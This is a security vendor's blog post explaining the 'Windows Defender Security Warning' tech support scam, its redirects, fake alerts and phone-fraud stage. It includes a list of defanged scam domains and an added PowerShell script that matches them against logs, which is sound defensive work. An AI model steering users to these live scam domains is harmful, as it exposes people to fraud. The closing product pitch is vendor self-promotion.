      The post Windows Defender Security Warning appeared first on Gridinsoft Blog.

      “Windows Defender Security Warning” is a scam website that falsely claims your PC is infected and urges you to contact Microsoft tech support. This scam is part of a larger scheme aimed at deploying unwanted software on users’ devices and extracting money for resolving nonexistent issues. It has been around for some time and targets users worldwide.

      Tech support scams represent a particularly notorious type of online fraud, utilizing various tactics to coerce people into making a phone call to a fake support service. The Windows Defender Security Warning scam is one of the most enduring and widespread methods used in these schemes. In this article, I will describe what this scam is, how it operates, and how you can avoid falling victim to it in the future.

      What is Windows Defender Security Warning?

      As mentioned earlier, the Windows Defender Security Warning typically appears as a browser window after clicking a link on a certain website. It displays numerous smaller windows, which are actually non-interactive images. These fake alerts inform the user that their PC is blocked “for security reasons”. In the background, a robotic voice claims the following:

      “Important security message! Your computer has been locked up. Your IP address was used without your knowledge or consent to visit websites that contain identity theft virus. To unlock the computer please call the support immediately. Please do not attempt to shut down or restart your computer. That will lead to data loss and identity theft.”

Clicking on any of the site elements, which in fairness may happen by accident, switches the website to full screen with no obvious way out. Esc often seems to do nothing, typically because the page requests full screen again on the next click or key press, and roaming the mouse around the screen does not help either. For a victim who does not know Alt+F4 (close the window), Ctrl+W or Ctrl+F4 (close the tab), Alt+Tab or Ctrl+Shift+Esc (Task Manager), it looks like a trap. That, together with the sound alert, is what is meant to push the user into following the page's guidance and calling the number.

Screenshot: typical example of a Windows Defender Security Warning page

      As you can see, this is just a scam designed to capitalize on the fear of individuals who may have less knowledge about computer security or computers in general. However, let’s take a closer look at how this scam operates—there are quite a few interesting tactics involved.

      Windows Defender Security Warning Mechanism Explained

      The scam begins by luring users to the Windows Defender Security Warning page. To achieve this, scammers often purchase link placements on dubious websites, such as those hosting pirated movies. A user clicking on a play button or attempting to skip an ad in the video player may be redirected to the scam site.

      The domains hosting this scam can vary widely, but they typically include some mention of Microsoft in the URL. In some egregious instances, fraudsters have even managed to secure hosting from Microsoft themselves. Below, you can find a list of sites used in this scam campaign:

• digitalcompletes[.]online
• spicyhotrecipes[.]site
• rickyhousing[.]xyz
• gardenhub[.]site
• morningh[.]shop
• robortcleaning[.]site
• jadeneal[.]autos
• programmaticcrooks[.]online
• elhiuwf[.]cf
• hitorikawag[.]top
• adultfriend[.]store
• yeddt[.]jet
• jonwirch[.]com
• aweqaw12d[.]tk
• helpadvance[.]ga
• 333waxonet[.]ml
• noblevox[.]com
• risingsolutions[.]online
• pixua[.]com
• adultfriend[.]site
• giveserendipity[.]website
• connectflash[.]ml
• ondigitalocean[.]app
• dothrakiz[.]com
• jbvhjcbjzvhxvhzcjgzvgcczgh29[.]ml
• digitalflawless[.]ga
• todogallina[.]es
• markmoisturise[.]online
• enterthecode[.]org
• ebonygirlslive[.]com
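To put the indicator list to use, here is an added example in PowerShell (not part of the original post) that refangs the defanged domains, pulls host names out of log lines, and reports hits on a listed domain or any of its subdomains. The log lines and the free-movies.example referrer are constructed for the demonstration, and only a subset of the list above is embedded.

```powershell
# Added example (not from the original post): refang the published indicator
# list and match it against hosts found in log lines. The log lines below are
# constructed for the demonstration; plug in your own proxy or DNS export.

# Defanged indicators, a subset of the list above, exactly as published.
$Defanged = @(
    'digitalcompletes[.]online', 'spicyhotrecipes[.]site', 'rickyhousing[.]xyz',
    'noblevox[.]com', 'pixua[.]com', 'todogallina[.]es', 'enterthecode[.]org'
)

function ConvertFrom-Defanged {
    param([Parameter(Mandatory)] [string] $Indicator)
    # "[.]" and "(.)" are the common defanging styles; restore a real dot and lower-case it.
    ($Indicator -replace '[\[\(]\.[\]\)]', '.').ToLowerInvariant()
}

function Test-ScamDomain {
    param([Parameter(Mandatory)] [string] $HostName, [Parameter(Mandatory)] [string[]] $Indicators)
    $h = $HostName.ToLowerInvariant().TrimEnd('.')
    foreach ($i in $Indicators) {
        # Exact domain or any subdomain of it, never a bare substring
        # (so "notpixua.com" does not match "pixua.com").
        if ($h -eq $i -or $h.EndsWith(".$i")) { return $i }
    }
    return $null
}

function Find-ScamHits {
    param([Parameter(Mandatory)] [string[]] $LogLines, [Parameter(Mandatory)] [string[]] $Indicators)
    foreach ($line in $LogLines) {
        # Pull every host out of URLs in the line (scheme://host[:port]/...).
        foreach ($m in [regex]::Matches($line, 'https?://([^/:\s]+)')) {
            $hostName = $m.Groups[1].Value
            $hit = Test-ScamDomain -HostName $hostName -Indicators $Indicators
            if ($hit) {
                [pscustomobject]@{ Indicator = $hit; HostName = $hostName; Line = $line }
            }
        }
    }
}

$Indicators = $Defanged | ForEach-Object { ConvertFrom-Defanged -Indicator $_ }

# Constructed sample proxy log lines: a piracy-site referrer, the redirect to
# the scam page on a subdomain of a listed indicator, and a benign request.
$SampleLog = @(
    '2024-06-07T16:40:01Z 10.0.0.21 GET http://free-movies.example/play?id=42 200',
    '2024-06-07T16:40:03Z 10.0.0.21 GET https://alert.spicyhotrecipes.site/?call=now 200',
    '2024-06-07T16:40:09Z 10.0.0.21 GET https://www.microsoft.com/en-us/ 200'
)

Find-ScamHits -LogLines $SampleLog -Indicators $Indicators | Format-Table -AutoSize
```

Matching on the domain and its subdomains rather than on substrings is what keeps the false-positive rate down: with the sample lines, only the request to alert.spicyhotrecipes.site is reported. Feed Get-Content of a real proxy log into -LogLines, or Get-DnsClientCache output on a suspect workstation, to look for past contact with this infrastructure.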

      Once the user lands on the scam site, it typically goes fullscreen and starts playing the previously mentioned audio message. The main goal of this message is to coerce the victim into contacting “tech support” using the phone number displayed on the site, which is mentioned multiple times. The phone call marks the final phase of the scam.

      The so-called support manager begins by instructing the user to download sketchy software purported to resolve the issue—without explaining how the software addresses identity compromise. Throughout the life of this scam, various fraudulent programs have been offered, including SystemKeeper, Driver Updater, and Wise System Mechanic. As expected, all these are pseudo-effective unwanted programs that further prompt users to pay for fixing a myriad of non-existent problems.

      What is the purpose of all this, you might ask? Money is the short and universal answer. The fraudsters posing as tech support managers receive commissions for each user they persuade to download the software. Meanwhile, the developers of this software profit from users purchasing licenses. Considering how long this scam has been active, the monetary turnover is quite substantial.

      How to Protect Against Windows Defender Security Warning Scam?

      The primary advice for protecting against the Windows Defender Security Warning scam and similar schemes is to avoid websites that initiate these scams. As mentioned, the majority of redirects to scam websites originate from pages hosting pirated content. This should be another reason to steer clear of such sites, beyond the fact that content piracy is illegal. Additionally, pirated software or games pose a significant security risk.

Learn what genuine notifications from security software look like, and what they never look like. Microsoft Defender reports through the Windows Security app and the notification center, never through a web page in your browser, and no other antivirus or antimalware product issues alerts that way either. None of them will block your computer and tell you to call support. And, importantly, no legitimate tech support from any security vendor will ever advise you to install questionable third-party software.

      Use reliable antivirus software with network protection. To prevent scam pages from opening and to ensure your system remains secure regardless of any fake alerts, a robust antivirus solution is essential. GridinSoft Anti-Malware offers excellent malware removal capabilities and network protection, backed by a multi-component detection system and regular updates.
